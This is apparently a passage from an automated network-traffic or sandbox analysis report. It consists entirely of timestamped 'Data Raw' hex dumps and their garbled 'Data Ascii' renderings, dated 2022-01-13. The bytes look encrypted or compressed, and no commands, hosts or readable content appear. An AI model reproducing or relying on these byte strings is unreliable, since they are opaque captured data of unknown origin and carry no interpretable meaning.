33 fb db 02 b0 53 8b 3c 5f 68 9e 09 20 6b be 5a e8 a6 bb fa 2e 68 28 9d e6 a9 8b c8 89 8c 42 f6 4e d9 1d
                          Data Ascii: /.>Nv>?t6Pq#c[MTt},i%^wK=h}j`x|$0s'D9*lLw6f^SST[6r9O'K[v n!*E.tNm%eF~Y}-^$7.]HoPtaD(qQIII3S<_h kZ.h(BN
                          2022-01-13 19:22:18 UTC135INData Raw: e6 65 6c fc 43 2d 3e 34 08 1d c3 b9 8d 04 5e da e4 14 77 25 f5 dd 83 7e cd 3e c1 3e 37 5a 69 01 28 7b 7d 2f c6 d6 eb 49 4b 68 06 b7 b5 fd 37 3c b8 d8 8e 77 32 4c da f0 11 76 c8 24 9e e9 20 61 6d 07 26 a4 b3 ab a6 b1 2f 2c 17 d7 11 9a 76 cd 6e 7a 1e 6c 99 1a 88 e5 3e 22 63 6f 7b 24 94 86 5c ed ad 81 79 ea 22 96 5c 93 5b c4 db 0d d9 59 95 57 26 c0 95 fc 1b e3 69 68 84 aa ad bb 59 27 31 b5 8a 2b cb 66 c4 db 66 e9 8e de e6 bf 11 4d 5b 72 e9 e3 fa b7 9f db 05 67 13 b3 d1 dc 36 63 03 6d e7 20 75 c8 3b 46 7a 5a ec 1c 96 fe 16 b6 8d 05 29 8e 3d 18 e1 ad d1 6b 4d d3 d4 43 d1 6f 46 3b 47 fb a7 95 aa df f4 f2 2e 09 70 59 84 ab c5 55 24 03 9b 4a a4 09 66 e4 1c de f5 c0 9a 07 98 aa 7d 4f 14 09 f3 c0 d4 e5 2e 4c 45 67 53 9d cd 29 08 63 43 2b a2 43 73 28 e9 be 73 f7 95
                          Data Ascii: elC->4^w%~>>7Zi({}/IKh7<w2Lv$ am&/,vnzl>"co{$\y"\[YW&ihY'1+ffM[rg6cm u;FzZ)=kMCoF;G.pYU$Jf}O.LEgS)cC+Cs(s
                          2022-01-13 19:22:18 UTC139INData Raw: 27 14 57 6f b6 de 07 4e 90 71 1f 7e b0 23 ab ba eb da 98 6b b6 37 4c 17 a1 92 7d 24 30 b1 d0 fd 9c 06 13 3a e9 4c a9 9a d1 d1 72 a3 72 62 e7 c9 ad fd ab 0f 2e 73 b0 77 3b d9 71 41 bb 58 fd d7 02 ce eb ae 97 fc 5f ca 27 95 ef f5 54 56 94 c4 92 0a 01 f9 fd c6 8a dc 8a 55 f5 5c f7 c7 7d 25 6d 77 39 dd c8 86 e9 62 38 14 14 34 09 f3 c1 46 db 16 10 34 d4 9b f1 37 a4 56 76 de 22 9d 68 4b 08 8f 41 af ad a6 be 73 34 89 8a 3f 25 1a 65 6e 97 fa 2d d6 e4 a6 7c 00 ba c2 72 3a 3f da 98 66 27 21 da 9c 58 f1 96 9b d5 02 3e 3d 4d 3b be 2e b1 b5 b2 a4 a2 7d 69 18 16 34 70 43 78 bc a6 b2 fa 31 ff d6 99 f1 e7 46 da 8c bd 8c a0 54 ae fc 5f 77 31 8e 30 bc ef 6f d0 5a f3 72 c4 61 88 71 55 c4 de 21 f7 97 8b c6 da ee 44 34 4c d7 01 2f 8f 4c 76 3b b3 aa 2d 02 70 ce 91 79 7d 39 08
                          Data Ascii: 'WoNq~#k7L}$0:Lrrb.sw;qAX_'TVU\}%mw9b84F47Vv"hKAs4?%en-|r:?f'!X>=M;.}i4pCx1FT_w10oZraqU!D4L/Lv;-py}9
                          2022-01-13 19:22:18 UTC143INData Raw: 99 43 a5 63 5e 04 bc 67 d3 1f 54 65 02 aa 2e 50 37 27 99 40 4e d5 7f c2 b4 49 ec e9 41 73 24 76 b3 ac f6 53 43 af ab 7b 33 95 e9 29 29 38 20 a1 39 ac 29 91 f5 da 53 c9 61 15 cc 22 c6 d3 2b 95 f8 52 4b 20 7a 55 79 7f b5 76 34 07 4b 4d 55 de 93 f5 cf 91 e5 5b 3e 79 dd 07 52 92 32 f7 c9 10 17 91 0a b2 44 75 70 4f 51 3c 77 66 35 97 94 22 23 47 58 80 00 f6 a2 12 27 b2 2d 42 a8 10 38 39 b9 27 4c c2 b4 7a 08 0c 53 20 21 13 30 0d b0 71 3b 35 f8 41 ac 90 d2 f9 aa 7b 23 6f aa 2b 91 1b 55 6a e0 dd 05 a4 92 71 23 7d df 18 32 53 21 37 44 2b 9b e3 11 c2 d7 62 3d a7 9d d6 f4 de 63 04 6b af b8 c3 4a cb 6a 5e 45 47 34 14 48 b5 29 64 8f 35 3f bb 37 a5 3e df 6b 57 28 a4 a9 ad c3 fd 55 5c 67 fb d9 9c 8b b8 4c 94 77 0a da 89 d1 cf bc b5 0e 83 ae c2 24 6f 0c 4c 26 b2 d2 82 78
                          Data Ascii: Cc^gTe.P7'@NIAs$vSC{3))8 9)Sa"+RK zUyv4KMU[>yR2DupOQ<wf5"#GX'-B89'LzS !0q;5A{#o+Ujq#}2S!7D+b=ckJj^EG4H)d5?7>kW(U\gLw$oL&x
                          2022-01-13 19:22:18 UTC147INData Raw: ff 6c f5 97 fc 33 f9 df 31 c7 73 3e 85 ce ee 55 b1 c6 32 12 52 8c 0f 8b 75 0d 9a a2 ba 0f 89 2d 18 1f 8e cf 16 c1 b4 5c 65 8f 93 79 87 c8 e4 05 59 73 5e 96 23 e8 c6 bc d4 24 3f b0 3c cf 7b 34 f1 e5 4e 7b 21 f1 66 d8 d9 9d be 8e ae cc 31 dd 98 d4 bb 3d 3c 38 b3 36 77 33 71 49 dc f0 bb fc 25 b7 bd 24 12 5d 81 8f e6 bf 5c fd 77 ef 42 24 73 60 b4 61 ed 0e 1c a7 73 0a e4 24 ef 61 11 2d ec 24 92 12 e2 12 3d 0c f2 4b 4e 7a da 97 9c 67 56 ec d7 69 15 34 5b 72 a4 f0 a5 8f 5c 28 7c 0c 48 dc ca a4 44 ae 08 e9 f6 e7 0f 80 b5 15 88 38 85 cb f9 2a 6e 3e b8 4d f8 26 0e 40 ad b8 33 2f ee fc 51 3d d6 97 87 9d 81 c4 6b 0c 5e 11 13 b2 d3 7d 29 d2 a5 d1 db 2d ca 28 e4 ab e1 1d 5e f2 15 b9 d5 9e 74 42 34 0c 03 7f 8c fe 60 bc 03 c2 c6 94 1f 48 25 98 88 5b 70 e2 c4 85 5c df 5a
                          Data Ascii: l31s>U2Ru-\eyYs^#$?<{4N{!f1=<86w3qI%$]\wB$s`as$a-$=KNzgVi4[r\(|HD8*n>M&@3/Q=k^})-(^tB4`H%[p\Z
                          2022-01-13 19:22:18 UTC151INData Raw: 53 f3 46 3c 1a 15 bf 4b 82 d1 f1 67 80 c0 a6 5b 07 6e 49 26 15 b9 e9 0e 12 98 de 21 47 f2 1b aa f6 b2 52 12 aa 88 b3 35 a2 a6 c2 3a 15 61 a6 1a a1 0e c7 7c 4c 88 30 02 d2 c2 bc ae f9 a8 a8 d3 97 39 63 49 07 cf ec 13 4a b6 f0 f6 fb b8 6e fe 22 86 6c 04 c8 75 61 cb 37 a5 3d 49 98 45 62 c6 aa 7f 28 70 d6 e7 66 f5 15 ec 40 a6 ef 9e ed 71 b2 bd 71 d7 b8 3e aa 1b 6e 7a cc 5a 02 f8 03 e7 68 cf 4a 81 0f fd b9 2c fe 19 68 15 b6 26 b6 68 41 80 a2 33 76 be 64 df c4 44 03 b7 65 88 45 79 9e 46 46 a9 c5 29 d4 08 5c 31 03 06 ba 32 87 56 c6 cb 24 82 83 b2 75 8b aa 8f 00 f7 f2 2a 79 77 b1 6c 3d cb f6 ab d2 5e c9 b1 77 55 14 5d 76 08 77 87 e4 77 46 da ce f7 21 a9 b1 70 6d 74 f4 3d 48 ee 5b bd 81 f5 74 a4 54 05 90 89 40 eb 51 47 48 e0 5e cf 76 90 9e a4 74 e5 64 8d 28 93 b2
                          Data Ascii: SF<Kg[nI&!GR5:a|L09cIJn"lua7=IEb(pf@qq>nzZhJ,h&hA3vdDeEyFF)\12V$u*ywl=^wU]vwwF!pmt=H[tT@QGH^vtd(
                          2022-01-13 19:22:18 UTC154INData Raw: b7 90 63 05 7b 42 65 85 b6 94 37 31 8a 25 6e 87 16 15 35 0c 81 1e 06 db c0 9e a4 c8 74 c0 e7 da db 36 42 02 4e 33 b3 e1 b7 c7 84 b6 58 f9 84 44 da 19 1b 43 de 6d 64 a7 37 50 37 2a 67 be d1 15 8f 2d 4d 0e 41 8b 82 0c 1c 30 38 84 a2 66 32 43 1c 13 cf db e8 49 31 06 12 8e c1 29 84 96 89 e5 4d 7b 38 c7 67 c6 ae 21 98 1c 16 aa 08 0c 72 0c f2 b2 b4 8e 0a e6 af 00 95 88 39 28 e7 1d b0 8e 6a 2a be d7 09 f2 85 58 78 9b ec 13 cb 27 95 fd 5e 86 3d f2 eb b7 34 7d 1d b1 b7 1c 18 7f 63 5a 20 f8 36 26 4e 7b 88 c5 1b 51 a6 d6 c7 fa 44 20 b2 54 8e c8 d7 7c ec 08 45 23 af a3 0c 6b c6 40 df 30 b1 1a 64 1f ff fa 37 08 0a 70 c9 ac b2 60 97 2d 9e 6f a6 0a 9e dd 3a af 6c f2 af 55 92 f9 9f 44 09 af bc aa e6 80 ef 6d c0 89 1a e1 f8 04 06 e2 11 49 84 71 97 d2 fe 8e 28 22 b8 6b fa
                          Data Ascii: c{Be71%n5t6BN3XDCmd7P7*g-MA08f2CI1)M{8g!r9(j*Xx'^=4}cZ 6&N{QD T|E#k@0d7p`-o:lUDmIq("k
                          2022-01-13 19:22:18 UTC158INData Raw: ec d0 2e 0d c4 4b 37 e6 57 92 f9 15 8f f7 8f f8 31 3d 12 b0 75 30 00 62 88 5b 37 c2 f7 2e 99 b3 ae bd a7 1c c8 e2 c6 dc f4 04 a0 35 47 4f 5a 47 27 ab dc 13 01 53 0f d8 d1 76 c6 83 63 e7 d4 ef 0b 07 3c 38 ca 2f eb a7 75 d2 a7 4c cc f8 4e d4 b3 f3 1f 15 09 64 df da 0a 76 89 8e 92 56 99 85 2e 08 02 b9 aa 5f d7 4b 35 6d 17 87 d9 fd 1e 33 3d 80 18 8c 22 24 2f 7d 90 8e a6 44 33 e5 f8 aa e1 1b e5 d1 c9 7f dd 8c e5 f0 fc 26 05 2e 75 95 fe 52 43 dc 4c af 36 e2 e2 da 96 1d 12 4e c9 f0 92 89 19 ac c9 46 bc 73 92 67 02 a9 dd 0d 8c 5d 68 e1 02 5e 05 22 71 83 d0 4f 88 35 78 ad c3 bf b1 af b2 34 82 a0 6c 33 ec d7 6d 86 b4 54 8e 05 29 c1 f6 47 59 3c 24 8a cf 44 64 8f b7 bf 31 c1 f4 e6 71 20 6e 87 d5 f4 87 d9 18 10 b1 d9 f7 fb 9a 67 98 c6 09 22 7c a3 3d 18 90 7a a8 0e 10
                          Data Ascii: .K7W1=u0b[7.5GOZG'Svc<8/uLNdvV._K5m3="$/}D3&.uRCL6NFsg]h^"qO5x4l3mT)GY<$Dd1q ng"|=z
                          2022-01-13 19:22:18 UTC163INData Raw: cb 73 3e 6f 13 7e 06 af 0f a5 ec 2a ee 56 f7 c9 65 fd 3a 20 28 b1 23 12 46 68 65 67 17 6e 87 c0 98 6b e1 16 43 d8 2d 31 88 f7 7e c1 1b ff ae 22 8b 25 fe 43 2c b8 3d 3a 4f 3d ee 18 0a b6 bb 4e d8 e9 69 15 bf db e1 71 24 02 28 18 54 75 c3 2a 17 36 6a 8a 48 ac c5 e9 48 81 bd 54 48 45 5a e1 8d 9a 1d 4d b1 a6 1a 03 24 36 61 0d d7 1c 02 c8 e1 f2 b3 be d4 55 da ef 90 84 40 98 db 69 0e 2e 0b c5 cf 93 9f 3d 79 89 b6 40 31 b6 35 8a 59 6c 97 96 69 0d 50 29 ea d0 a1 ef 25 a6 ee b4 27 67 64 87 43 04 d5 d8 74 a3 df 64 f6 55 7c c5 50 11 b5 af 45 c6 de 80 d0 04 d7 a7 2e 6a 3f 2d e9 2c 6a 95 fd bd 2a 12 d9 0f dd 07 87 0d 38 49 52 1e 00 b9 43 2c ef 59 13 af b6 86 20 7d 2f 7c 6c f5 a5 96 b1 c1 53 56 4b 2a 77 47 2c 18 b1 c6 ca f6 f6 96 19 c9 f1 5e e5 3e a6 24 dd 5f 0b 54 12
                          Data Ascii: s>o~*Ve: (#FhegnkC-1~"%C,=:O=Niq$(Tu*6jHHTHEZM$6aU@i.=y@15YliP)%'gdCtdU|PE.j?-,j*8IRC,Y }/|lSVK*wG,^>$_T
                          2022-01-13 19:22:18 UTC167INData Raw: 5c ae 8e 88 70 de 3f a8 f6 46 a2 ae 92 11 5d 1a 14 2e a5 2b 97 88 28 a3 47 19 b9 45 4a a9 ed e2 7b 32 f3 84 0a f0 73 9a 6f 50 8b 90 3d 7a 01 3d 1d a8 4e 9b b3 70 14 49 a6 19 dd 6a 85 cd 71 85 3d 1e ae 44 d0 fe 10 2f 01 c6 bc 64 3e 4a 58 9e 62 ef af 11 be b5 2d 30 6d 7d 52 b9 4f 6e c3 f7 f5 81 04 39 7a e0 3f 92 32 c4 f6 7d d4 d1 35 52 96 80 10 25 4f 29 1a 63 b0 2a 60 6a 77 5e 55 06 c7 0e e1 ae 37 c7 18 cf ae 6e f3 cc ec db 71 f8 fb cc 5c ad fb 9b 32 ac 35 da c9 2e 51 8f 09 35 7a f8 1b b7 63 ef 38 77 63 43 56 23 48 d3 60 e9 0b c3 51 55 c4 2b 65 db 72 43 a8 59 eb 9d 38 af 3e d3 f9 66 ee c9 1c 86 ed 44 4f fd 28 64 ea 4e b7 cc 95 54 0f ab c6 79 d5 10 3b d9 74 a3 be 89 73 11 8e a0 8b 11 8d 74 85 90 ad 5a ac 5b 02 f3 19 9a 05 fa d5 19 4d 47 a6 09 46 63 ef 5a 7d
                          Data Ascii: \p?F].+(GEJ{2soP=z=NpIjq=D/d>JXb-0m}ROn9z?2}5R%O)c*`jw^U7nq\25.Q5zc8wcCV#H`QU+erCY8>fDO(dNTy;tstZ[MGFcZ}
                          2022-01-13 19:22:18 UTC171INData Raw: 17 c4 6a 4c b8 84 93 b7 35 33 3f e2 93 fa 4c ad 67 e3 52 cc e4 a7 9c 02 aa 29 4f ec e1 13 c6 cf 7e a5 84 42 25 03 06 a6 0b 6f d9 1d 7b d4 ba c8 ec b9 06 a8 64 8e 2d 8d eb 31 7f 1e 0b 3e f8 e0 a5 ce 3a 9f c7 61 d6 27 3a fd e3 cd b3 b7 55 ab b5 80 77 21 fd 77 f7 83 ae 55 7e 8f cc fb c4 33 47 5d f4 84 9c ec 6f 20 b3 f4 a2 c3 03 07 cd ce 8a ce ff 38 26 b0 36 05 3d d9 72 50 e0 db a7 85 c6 de 37 19 6a 91 e3 1b 9b 90 cf d0 04 bd 5d 70 a9 b7 b7 b7 b2 db d1 1b f1 aa 05 31 85 5f 6c 2d 9a 18 e4 37 bc c0 dc 3a 8b a1 3f b3 bc 9e a9 43 a4 a6 12 55 09 de 2a 1d ea b4 70 d1 96 c3 44 5c 63 7a 39 c3 95 48 d3 71 27 ed 24 b2 8f ec bb 45 59 62 5f 99 fc 4a d6 9d 91 7d 7d 3d b6 40 36 04 b3 57 80 2d 80 59 71 0a 13 6b f4 27 9e 1d 09 36 0c 42 51 25 ed 4d 75 25 e6 2b 31 83 6b 85 79
                          Data Ascii: jL53?LgR)O~B%o{d-1>:a':Uw!wU~3G]o 8&6=rP7j]p1_l-7:?CU*pD\cz9Hq'$EYb_J}}=@6W-Yqk'6BQ%Mu%+1ky
                          2022-01-13 19:22:18 UTC175INData Raw: a2 1b eb 33 9e 27 7a 87 67 d8 61 78 b8 34 0d d9 01 9f ed f2 a8 1e 62 90 61 fd eb 04 9d 4a 64 83 c1 52 d1 10 d5 88 ec 7c 5f 78 b0 28 00 e0 79 01 78 6d fe 52 cb 7f c8 d5 05 f3 55 b0 c4 aa 25 eb 25 24 5f fd 86 99 4e bb 56 ef 31 df 20 07 b0 f2 f6 22 76 a3 83 00 1c b5 ca 3e 8a 2b 8a 49 42 5f ee 82 2e c8 13 a6 16 54 f5 48 f6 db 1c bc 21 83 d0 e7 37 28 6e 08 9e d9 bd 3b b3 b5 b9 22 8d fd 03 f6 fd 5d 7f ce e2 9a a6 74 18 83 73 ac 2b 88 49 20 df 7f d1 ad 4c 29 91 fb dc 2f 33 4e 7d fa e8 50 db 19 c9 e4 09 7f 2b 43 0c b7 a4 1e 7f a0 6f fd 47 87 65 f1 29 91 fe 8b 79 b7 1a b7 57 84 4d 58 e6 fb 39 d5 33 5c 43 0f df 16 4d 80 1c ec dd cb 80 ec b9 4e ca 70 54 98 c6 19 6f f1 28 16 44 4d 12 13 88 8b 34 f8 4a cd 64 14 84 5f 14 89 39 dc 8a 50 d0 79 e6 d7 16 8d 0e 2d 90 6b 1a
                          Data Ascii: 3'zgax4baJdR|_x(yxmRU%%$_NV1 "v>+IB_.TH!7(n;"]ts+I L)/3N}P+CoGe)yWMX93\CMNpTo(DM4Jd_9Py-k
                          2022-01-13 19:22:18 UTC179INData Raw: 2b 49 fd 59 08 b8 3b f8 a9 bb 56 97 1e 17 31 8a 24 59 cd 14 31 f3 d4 80 19 f7 ab 17 ce 89 35 60 07 8a 93 e4 8e 68 d0 38 08 c5 37 1b 14 35 55 da 48 b1 b0 ad c0 95 dc ed fb b9 31 22 c5 e6 35 8e 9c 69 db 66 42 87 b8 4a 53 95 96 f5 c4 a5 8b bd 78 8b 05 b7 34 9a da 23 94 31 33 f2 8c 2c 19 00 2f fe 09 1b 36 55 99 f8 57 d2 95 8c b2 b7 df 03 fe ac 98 b9 28 34 46 7e aa be 17 db 18 ba a1 40 0a 76 d5 e5 4b 18 2a 90 01 ca 84 40 3c 25 9d 0c c8 6c a5 28 e3 29 cc 46 03 e0 3d 55 7a b3 76 92 06 06 39 90 59 fd 68 aa a9 aa ce 49 cc 81 bb 3e 2d 5d 0a 51 5c e9 31 85 7a 99 a3 ba ed 25 0b a7 47 a1 dc 18 26 89 a5 4a 95 14 dd be fc b4 a2 7d cf 07 c5 74 1a 69 e1 96 64 68 5e 2d fb ad 55 85 12 4f b5 a3 1d 65 79 b2 2e 7f cd 8f 2a 6c e9 5e 9c 9b 0e a0 0f cb 59 9f bf 60 07 58 df f4 6e
                          Data Ascii: +IY;V1$Y15`h875UH1"5ifBJSx4#13,/6UW(4F~@vK*@<%l()F=Uzv9YhI>-]Q\1z%G&J}tidh^-UOey.*l^Y`Xn
                          2022-01-13 19:22:18 UTC183INData Raw: a3 0c fb 1a 88 b9 c0 57 e6 e6 a4 90 6d e0 28 a1 6c 29 79 b5 9f 75 1a d0 4e 22 df 0d 82 3b 18 6e 76 b9 bb b5 de 09 2f 5a 9f 6b e2 1e f6 1c d6 ab 9b 47 ab ae f5 b9 d6 45 bf de c9 f7 32 38 ac 3d e8 5f 0c 70 23 5a d3 c3 52 d6 14 9e e6 40 b2 5f 7f 7a 6c 69 3b 4f a3 fe 61 66 bb 2d 5e 23 86 e9 7e b5 bd 59 d3 71 d5 42 c3 7a d8 5a 94 a6 a8 f0 50 ed e2 17 3d 04 c3 b7 07 3e 2f 9d d5 1c 9b a6 ed 4b f0 37 2a a8 9f d9 5d 76 55 14 6d 42 36 64 e9 23 5f 82 7f 7a a0 03 c5 11 55 2f 3a 58 81 8f 46 1a 14 1b 64 c5 2a c4 f2 6b 94 77 20 ea ad da 48 a6 b0 75 aa 73 47 b2 9a a2 9d 80 52 b3 0e 45 54 f1 23 07 bb 03 be 0e 29 69 a3 87 6f c0 e4 6f 96 1c 4e 9c 84 63 63 8f e3 3c c2 8d 82 eb 1e 63 03 27 b5 ca 6d 2a ad 79 cd 2c 15 df a0 f3 b4 07 ad c2 35 60 7b 9a 2a 36 ae 21 95 2a 62 49 35
                          Data Ascii: Wm(l)yuN";nv/ZkGE28=_p#ZR@_zli;Oaf-^#~YqBzZP=>/K7*]vUmB6d#_zU/:XFd*kw HusGRET#)iooNcc<c'm*y,5`{*6!*bI5
                          2022-01-13 19:22:18 UTC186INData Raw: 4b 7e a0 28 86 ea 34 07 0e 82 b6 41 71 87 29 7d d8 ab 30 f0 0d 88 22 aa 4c c8 f5 ad 28 1f 7e c2 83 0f c9 7e 4e cf df 45 94 b3 e8 0e a5 d6 34 be bd 78 30 6c da 1d 64 e9 69 ad 8b 95 7c 05 f0 0a 37 bc 2c 5d af b0 f4 a2 dc 1d 32 32 68 30 99 a3 d9 d2 c4 90 53 7c b4 05 c0 c6 d2 29 7e 89 eb 38 80 7e 4f 7a d7 1d 57 1d 1b e9 5e 94 3f 6e 80 9d 4c be d6 37 8f b4 ce ac 71 e0 ae 6f 3b 25 d0 31 2e ef f2 1c c7 48 a8 7c 8c 7b ed cf 25 68 af af 29 39 7c f0 6d 67 6a a2 4e 09 78 2f 7d 5b e6 16 94 bf 8d fa 13 0b fe 61 bc f5 03 35 70 56 30 bd 0a aa 70 4f 4b e9 e6 96 6d c2 88 bf f5 f6 17 7c 15 07 81 54 c6 9f b7 b3 17 34 b6 35 7b c1 d5 e6 0b 24 ae 83 ad e1 cc a3 77 42 34 86 c1 30 56 e0 05 50 9f d4 d7 b6 9f dc 99 7c b5 56 f4 ea 5f d2 e1 6e fa b8 41 59 19 5b d7 95 9e 3c f2 d0 3d
                          Data Ascii: K~(4Aq)}0"L(~~NE4x0ldi|7,]22h0S|)~8~OzW^?nL7qo;%1.H|{%h)9|mgjNx/}[a5pV0pOKm|T45{$wB40VP|V_nAY[<=
                          2022-01-13 19:22:18 UTC190INData Raw: a1 cb 87 04 c6 84 6b c8 4c ad 62 75 96 8e d6 a8 93 c1 37 10 e8 6d 35 54 36 46 ea a7 ed 56 b8 ff f1 a2 b7 f6 e6 a2 ee 47 af b8 fd 2f db b2 78 ed ea 14 72 3c 77 33 51 bc 90 c6 bd cd 23 13 b1 cb be cf 82 5e fb 83 8b a7 20 97 4c 71 b8 86 c2 f3 df 97 81 f2 14 61 66 9e dd d7 c8 e4 10 ae 0e 8c a3 e0 f8 a3 18 f3 eb 12 dd 78 11 a0 b8 55 25 50 80 53 89 11 0c 17 de 52 50 04 23 69 39 a6 4a 94 31 b2 4c fe 5f 9b f1 3c db 7f d7 1a f3 e9 7b c1 db c0 4a dd c3 ef 41 03 45 5f be 83 45 45 b0 df 79 3a 6d 2b 2e a1 08 4b d5 96 d1 4b d1 b4 e0 d7 d1 09 41 46 40 ff e2 da 4a b4 cb e1 07 ad ed 0a e7 48 62 5d 55 3d 83 0d b1 7d f8 3b e5 6a 9f 5a 0b 89 7f db 93 5a b5 b2 f0 a8 f2 a0 ef 6e 66 82 a9 5b cb e7 b7 24 09 52 fa 98 42 a4 80 e1 0d 87 4d 91 31 19 b6 07 40 8f 75 32 47 cf c8 ca 13
                          Data Ascii: kLbu7m5T6FVG/xr<w3Q#^ LqafxU%PSRP#i9J1L_<{JAE_EEy:m+.KKAF@JHb]U=};jZZnf[$RBM1@u2G
                          2022-01-13 19:22:18 UTC195INData Raw: 59 9c ad 4f 1b cf 8e 8e 56 d9 b5 f6 b1 7e 56 d8 ec 8b 8b 40 4c a7 5c 93 ba c5 f2 a7 8c b9 79 18 54 37 29 7a 8e 26 8f db ad 9a a6 68 3d 60 49 1f d1 9a f8 9d 71 ab 03 03 ab 2b 2a 65 d5 98 b5 76 7e 7f 63 4d 8e c8 32 ac 88 bb 7d 36 c2 57 44 90 98 16 70 c8 23 b9 ce f9 46 dd 2b 27 28 cd a2 c8 69 10 01 40 a2 07 88 59 e5 09 d6 49 a3 91 12 1d 38 2d 83 6e db 3b 5f 68 6d b9 67 7d 84 f1 09 a3 51 1f a5 1d 33 e3 3c 18 3e b9 1b 51 37 7c b4 92 33 a9 ec 6f 6f b3 19 83 00 30 e6 6b eb 66 c6 82 28 69 e0 f4 04 f6 39 c2 f6 e9 a7 ba 0a 64 13 cb f5 8e 05 f7 db b0 dc 77 cd bd ff 13 58 4a 63 68 9f 5a d5 21 24 0e a4 34 12 d3 99 a1 b6 c5 10 47 45 51 e6 66 04 d6 01 ef d2 12 a4 9a 53 c2 ab 4f d5 9c db 70 f8 8e e7 73 c6 a0 33 a0 73 38 67 2b 90 70 94 12 ff be 43 27 c7 31 46 b1 41 60 9d
                          Data Ascii: YOV~V@L\yT7)z&h=`Iq+*ev~cM2}6WDp#F+'(i@YI8-n;_hmg}Q3<>Q7|3oo0kf(i9dwXJchZ!$4GEQfSOps3s8g+pC'1FA`
                          2022-01-13 19:22:18 UTC199INData Raw: 14 d7 45 35 e8 f9 df e0 d0 f6 5e 13 af 2d 92 7d 84 6a c5 23 fd 7f 63 57 e8 04 07 1c fe 89 2d 05 0d 4e 83 83 ea c0 86 8c 7f 76 c1 c1 30 8d 21 a5 53 0a d6 ca 34 94 09 6b fe 79 c8 f6 af f8 e3 04 6c 92 40 bb 9f c6 3d b8 35 13 7f ad d6 a4 63 95 67 de 4b a8 de 8a 31 17 2f a9 28 01 ff 8b 7a 73 ae e6 6b 2f 00 fd 27 75 64 40 7b 04 ca 7a a6 5e 0e f3 45 97 b3 ab 26 ed c9 8c 1e 34 1e 6e a5 36 bf 16 9d 47 14 ac 6e 4e fc 06 7b 2d 33 6a a3 19 77 35 0a 41 41 98 07 d3 9e 65 84 df f2 58 81 f0 74 a8 d1 e1 bd 23 3e 98 50 83 cb a5 af ba 26 49 42 a7 50 a9 51 c6 c4 c3 d7 af 78 53 70 12 1c 2e a0 42 4b df 4b 1d ff 62 1b db fd 36 3c dd 75 a7 48 c9 bb 7b 71 f7 89 2a 92 ea 77 a7 3a 18 fd 0a 14 bd 50 a4 67 4b f1 7d ce 20 00 36 57 26 20 ec 51 bc 3b cd bf 48 fe 75 b2 31 bf da b1 8c 1a
                          Data Ascii: E5^-}j#cW-Nv0!S4kyl@=5cgK1/(zsk/'ud@{z^E&4n6GnN{-3jw5AAeXt#>P&IBPQxSp.BKKb6<uH{q*w:PgK} 6W& Q;Hu1
                          2022-01-13 19:22:18 UTC203INData Raw: 0f b7 bb 8a 72 93 04 9e 2a 29 96 30 d8 ca 49 87 e1 d0 52 40 88 31 b8 15 f6 74 b8 3a 2e 42 1e 5d 06 cb 7e 06 b7 17 94 e1 79 48 c2 eb ec 8f c5 63 1f 10 64 3d 00 3b 77 0f 86 97 8b ee b5 aa e3 61 19 0e 0e f4 3e 5f 8f a8 91 37 c7 1e 3c bd 94 6f 2b 55 05 bc 57 b1 86 06 b4 49 8f 36 5b 74 0c 12 08 3b d1 78 ac 1e 0f 41 80 91 8e 11 df df 10 4c 89 26 c0 e3 85 a6 0e 5e f1 0d 1a 9f 70 79 7e 3d 8c e5 93 87 ad 8e 98 c1 63 8f bf da bc a4 45 bc 02 9b de 88 82 99 50 3f 3c 71 a3 d2 c4 e7 74 c8 07 45 2c 48 72 d7 90 62 2b 4f 48 7a a7 ea 51 60 47 21 40 6c 27 af ba be fe 4b 07 ca c5 f9 ee 4e b0 fa 69 6f 24 f7 a9 41 55 96 a8 5a c2 b5 26 bd 1f 75 12 40 41 a9 ef c2 e0 ee 7f 49 03 b8 8c db a2 9f 57 ba 99 97 9a 18 67 61 52 5d 42 42 57 fa 2b 40 b5 59 45 a6 d6 11 5d 53 f6 f4 7d c8 bb
                          Data Ascii: r*)0IR@1t:.B]~yHcd=;wa>_7<o+UWI6[t;xAL&^py~=cEP?<qtE,Hrb+OHzQ`G!@l'KNio$AUZ&u@AIWgaR]BBW+@YE]S}
                          2022-01-13 19:22:18 UTC207INData Raw: 3f 98 6b c0 ed c1 a2 31 2d 2d 6b f5 e9 51 c7 0f eb c5 98 11 42 15 78 43 26 c3 f7 e4 92 88 6a d7 f5 21 35 ff 89 c5 d2 11 20 3a 3a a8 b8 5c 74 5c 6d e5 45 13 e4 ad 46 da 68 e9 a3 be d3 48 06 53 7f 64 02 bc 18 56 b3 7a b6 e7 fd 31 93 33 e8 f6 42 b4 e7 35 ee 92 ad 54 2a 97 0b 80 50 da a0 4d 3a 01 0b 59 08 a4 5c 90 8d 75 3a 3d 9a 37 e4 41 d4 ae f1 0e b1 dd de a2 38 d9 62 8f 22 b7 5b 05 c7 fb c7 80 4c ed 40 ac 4c 84 0b 2c dd 73 38 48 37 4b a0 00 47 3a 9a 02 d2 d8 f6 dc cc 0c 29 26 36 8a 91 ed d0 7b 4c 01 cd 08 28 41 fb 11 4e 91 89 d7 1b 9d ae 0a ee 50 e8 58 19 b5 7d 97 5a 44 c0 af 7f f6 d3 0a 99 76 46 5f a2 f9 06 8a 65 ee 50 d1 f7 1f 0a 4f 1d 7a df 12 26 5c 5e 4b 5d 10 8b cd d2 68 2f ed 2e 0b 4f a0 82 5d 7b 60 9c 97 6f 64 e9 48 54 6d 91 5a f5 0c ae c2 42 ad 42
                          Data Ascii: ?k1--kQBxC&j!5 ::\t\mEFhHSdVz13B5T*PM:Y\u:=7A8b"[L@L,s8H7KG:)&6{L(ANPX}ZDvF_ePOz&\^K]h/.O]{`odHTmZBB
                          2022-01-13 19:22:18 UTC211INData Raw: ff 80 9c 58 0e a0 39 ca 96 17 4b 7e d3 aa 43 88 2c 35 4e 37 9a 77 d6 1c 62 d2 88 fe aa 19 ae 64 1d 25 fb de 66 48 bb 44 41 c0 b8 1d 05 c7 bd 07 3f 47 c4 26 d0 65 5b 07 c5 f8 7d 7c b6 32 bf 20 fe 09 77 45 42 55 ea 25 65 f0 a4 85 67 8b de 7a 43 d9 1f 9e b0 59 27 72 7f 2d 74 0e 8f 65 10 89 e8 d9 6e 0b 7b 85 3c a6 9b 97 cf be 68 00 da 7b 59 db ef c0 32 12 79 80 8d c9 b9 6f 62 aa fd 61 af 6a 9c 51 bc e6 70 c2 5b 22 f0 7a 26 56 b9 03 9a 85 a5 e8 64 ed 8b 35 f5 44 22 c7 74 8a 4b 17 bb 8c 72 98 45 54 59 77 7a 96 95 1b 2e 5d f3 1e df 9b a7 00 54 e1 dd b4 e8 d5 6a 9c 7a 84 c6 93 7d 52 ee 53 